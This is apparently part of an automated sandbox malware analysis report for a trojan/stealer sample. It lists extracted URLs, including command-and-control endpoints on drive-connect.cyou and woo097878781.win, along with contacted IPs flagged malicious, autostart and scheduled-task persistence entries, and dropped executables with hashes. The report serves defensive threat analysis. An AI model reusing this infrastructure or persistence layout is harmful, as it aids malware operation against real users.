                                                                                        https://github.com/mgravell/protobuf-netisUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYicad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            https://drive-connect.cyou:443/apicad620f7d1.exe, 00000024.00000003.3053058436.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3057715788.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3054039751.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              http://x1.c.lencr.org/0cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://x1.i.lencr.org/0cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://drive-connect.cyou/Rcad620f7d1.exe, 00000024.00000003.3053058436.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3093791267.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3094834817.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3054039751.0000000000BAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    https://stackoverflow.com/q/11564914/23354;sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installcad620f7d1.exe, 00000024.00000003.2797324014.0000000003220000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://woo097878781.win/66/api/endpoint.phptjalvjhtgxjbffgqexplorer.exe, 00000017.00000003.2606864640.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://woo097878781.win/P.txtC:explorer.exe, 00000017.00000003.3849116928.0000000002D33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3308036317.0000000002D33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://contoso.com/powershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  https://woo097878781.win/P.txtmsmpeng.exeexplorer.exe, 00000017.00000003.2606864640.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesUSFJjY.exe, 00000006.00000002.2619824711.0000026950C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2572181326.00000190DDC51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94cad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          https://drive-connect.cyou/apiDcad620f7d1.exe, 00000024.00000003.2966933877.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2967091046.0000000000B9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://stackoverflow.com/q/14436606/23354sUSFJjY.exe, 00000006.00000002.2619824711.0000026950D01000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgcad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icocad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2601597145.00000190F5F88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2601597145.00000190F5F88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          https://github.com/mgravell/protobuf-netsUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                            https://drive-connect.cyou/:Mcad620f7d1.exe, 00000024.00000003.2850001201.0000000000B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctacad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://ocsp.rootca1.amazontrust.com0:cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016cad620f7d1.exe, 00000024.00000003.2797139581.000000000324C000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2849928748.0000000003245000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2838150959.0000000003245000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://woo097878781.win/66/api/endpoint.phpIexplorer.exe, 00000017.00000003.3848708673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2667541330.000000000086D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://woo097878781.win/66/api/endpoint.phpJexplorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://www.ecosia.org/newtab/cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://drive-connect.cyou/;8cad620f7d1.exe, 00000024.00000003.3014208092.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2601597145.00000190F5F88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://ac.ecosia.org/autocomplete?q=cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://woo097878781.win/66/api/endpoint.phpxexplorer.exe, 00000017.00000003.3848708673.0000000000895000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3308227661.0000000000895000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2664467654.0000000000892000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgcad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://drive-connect.cyou/groucad620f7d1.exe, 00000024.00000003.3093791267.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000002.3122773825.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3094363782.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://stackoverflow.com/q/2152978/23354sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                            https://support.microsofcad620f7d1.exe, 00000024.00000003.2797139581.000000000324E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://usbtor.ru/viewtopic.php?t=798)Zae91ff4264.exe, 0000000D.00000000.2589286710.0000000000423000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                                                    https://aka.ms/pscore68powershell.exe, 0000000A.00000002.2572181326.00000190DDC51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://drive-connect.cyou/cad620f7d1.exe, 00000024.00000003.2850001201.0000000000B97000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                        https://drive-connect.cyou/apiocad620f7d1.exe, 00000024.00000003.3036675220.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplescad620f7d1.exe, 00000024.00000003.2797324014.0000000003220000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse

                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                              Public IPs

                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              185.215.113.43
                                                                                                                                                                                              		unknownPortugal
                                                                                                                                                                                              		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                              37.203.243.102
                                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                                              		44964DAPLDATAPLANETLtdRUtrue
                                                                                                                                                                                              34.226.108.155
                                                                                                                                                                                              		httpbin.orgUnited States
                                                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                                                              141.8.192.141
                                                                                                                                                                                              		home.fivegr5sb.topRussian Federation
                                                                                                                                                                                              		35278SPRINTHOSTRUtrue
                                                                                                                                                                                              185.157.162.216
                                                                                                                                                                                              		unknownSweden
                                                                                                                                                                                              		197595OBE-EUROPEObenetworkEuropeSEtrue
                                                                                                                                                                                              185.215.113.16
                                                                                                                                                                                              		unknownPortugal
                                                                                                                                                                                              		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                              154.216.20.243
                                                                                                                                                                                              		woo097878781.winSeychelles
                                                                                                                                                                                              		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                                                                                                                                                                              104.21.79.7
                                                                                                                                                                                              		drive-connect.cyouUnited States
                                                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                                                              31.41.244.11
                                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                                              		61974AEROEXPRESS-ASRUfalse

                                                                                                                                                                                              Private

                                                                                                                                                                                              IP
                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                              General Information

                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                              Analysis ID:1575550
                                                                                                                                                                                              Start date and time:2024-12-16 00:59:04 +01:00
                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 15m 58s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                              Number of analysed new started processes analysed:59
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                              Technologies:
                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Sample name:file.exe
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal100.troj.spyw.expl.evad.mine.winEXE@102/63@19/10
                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                              • Successful, ratio: 75%
                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                              • Successful, ratio: 60%
                                                                                                                                                                                              • Number of executed functions: 170
                                                                                                                                                                                              • Number of non-executed functions: 231
                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                              Warnings

                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.181.99, 64.233.164.84, 172.217.17.78, 20.190.181.1, 40.126.53.16, 20.190.181.2, 40.126.53.9, 40.126.53.7, 20.190.181.23, 20.231.128.65, 20.231.128.67, 172.217.19.206, 216.58.208.227, 64.233.163.84, 52.149.20.212, 13.107.246.63, 23.218.208.109
                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, t.me, ctldl.windowsupdate.com, clientservices.googleapis.com, sedone.online, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, shineugler.biz, clients2.google.com, ocsp.digicert.com, tacitglibbr.biz, login.live.com, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                              • Execution Graph export aborted for target RegAsm.exe, PID 7712 because it is empty
                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7472 because it is empty
                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                              Simulations

                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                              00:00:03Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              00:01:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs
                                                                                                                                                                                              00:01:48Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                              00:02:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 84d98ae8ad.exe C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exe
                                                                                                                                                                                              00:02:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run eb571902cc.exe C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exe
                                                                                                                                                                                              00:03:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cf4367ad3a.exe C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exe
                                                                                                                                                                                              00:03:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 8d37f89c6f.exe C:\Users\user\AppData\Local\Temp\1015829001\8d37f89c6f.exe
                                                                                                                                                                                              00:04:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 84d98ae8ad.exe C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exe
                                                                                                                                                                                              00:04:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run eb571902cc.exe C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exe
                                                                                                                                                                                              19:01:02API Interceptor65962x Sleep call for process: skotes.exe modified
                                                                                                                                                                                              19:01:24API Interceptor36x Sleep call for process: powershell.exe modified
                                                                                                                                                                                              19:01:29API Interceptor2x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                              19:01:42API Interceptor7x Sleep call for process: cad620f7d1.exe modified
                                                                                                                                                                                              19:02:21API Interceptor1721x Sleep call for process: e42ef86dbf.exe modified

                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                              IPs

                                                                                                                                                                                              No context

                                                                                                                                                                                              Domains

                                                                                                                                                                                              No context

                                                                                                                                                                                              ASNs

                                                                                                                                                                                              No context

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              No context

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              No context

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4482048
                                                                                                                                                                                              Entropy (8bit):7.982269541271083
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:98304:jWBa44QD95F4DK0fhOyCkOv9FjK1nbOFfeMIHAq8jNJZDG6hQg:jWBl4mkK6HObjUKFfMHI5Dba
                                                                                                                                                                                              MD5:7BDD52D200B7195B67E68677DFD53B48
                                                                                                                                                                                              SHA1:2C6E16D9905D1727F71CFB807D5F44FFFB2BF34B
                                                                                                                                                                                              SHA-256:0A0E9A6E074898066418D7916D49F16F262E58B4F670CDCEBE17DED36BF0B1B8
                                                                                                                                                                                              SHA-512:F913CFA2608E147EA1E837D4DFDE32E91F12C482AE5F494C7F5516E9735BF6364BC5F4D8CF82BF1485FABF840B47854C4767BC7B673279ECBB12E7B258E9C847
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L]g...............(.\G..fm..2...........pG...@..........................0........E...@... ............................._.j.s.....j........................................................................................................... . ..j......2(.................@....rsrc.........j......B(.............@....idata ......j......D(.............@... ..9...j......F(.............@...tvjsubtq............H(.............@...qahvagxv............>D.............@....taggant.0......."...BD.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1836544
                                                                                                                                                                                              Entropy (8bit):7.9467633782755005
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:MKB1x6gJvw5Ksk6i4Twa1+tkQaoKMBkCOQ4T7F1dgbg9vzatkfBid8Ci:JB1j4dkO2aoTB5OFw2id1i
                                                                                                                                                                                              MD5:2B42A6845CEBBDB99B482BB1368550A9
                                                                                                                                                                                              SHA1:A77C1869DCF86FCB2599103F0BBA1F8A37D4F524
                                                                                                                                                                                              SHA-256:3047C85EFBA5F953D7308CD6CE571369962417B1F094B8C3129BAE3139503D3A
                                                                                                                                                                                              SHA-512:03DE82140E61B1260C47136BDC3E1EF7F1A81F09B7AD9AE13D90A2C229E1285287D9B878C27879CDE2A5667D39B0E48C166450F4473954040784EFD93C0D1459
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................*........j...........@...........................j.....N.....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... .`+...$......|..............@...skauaiwm.p... P..b...~..............@...npkvhzbc......j.....................@....taggant.0....j.."..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sUSFJjY[1].exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):89640
                                                                                                                                                                                              Entropy (8bit):6.349551184218018
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:07Se/hE9pxIN1e8Lf0HbqH5D62np/cvarqWjc6Tpzz:07thEvmuf7E5DP/TqWjBpn
                                                                                                                                                                                              MD5:3C104350CC2661C345673E91ED672C4C
                                                                                                                                                                                              SHA1:D205E94D47949CF3BC3F5226978F6D370C3D3B94
                                                                                                                                                                                              SHA-256:1FB9F279263C252A09F12B69C7238C18D2325F7CF7250EBE24AD9149ABE62CF4
                                                                                                                                                                                              SHA-512:9C02BDE2D096E181F00E906F4E242905D0E54DD207F309764805C7444C9F43073106812ADE97FCA9FC2363F59ED071371276880CE85E9A307FCDB03D3250CF6A
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...FG_g.........."...................... ....@...... ....................................`..........................................................`...............6..((........................................................................... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@........................................H..........................h............................................0..........(....*.*.(....*F w>..(....(....&*.(....(....*....0............ .>..(....(..... Y?..(....(.....s........o......s...........s......+..s.... l?..(....(.......&...,.......io......o.........,...o.......,...o...........,..o.......*....4....H.._........E.6{........9.N.........(.p.......2(.....o....*......(.... .>..(....(.....(....(...+o....*Z .>..(....s.....(I...*.s....(Y...*.......*V !=..(....~....(....*...

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4438776
                                                                                                                                                                                              Entropy (8bit):7.99505709582503
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                              MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                              SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                              SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                              SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                              Reputation:unknown
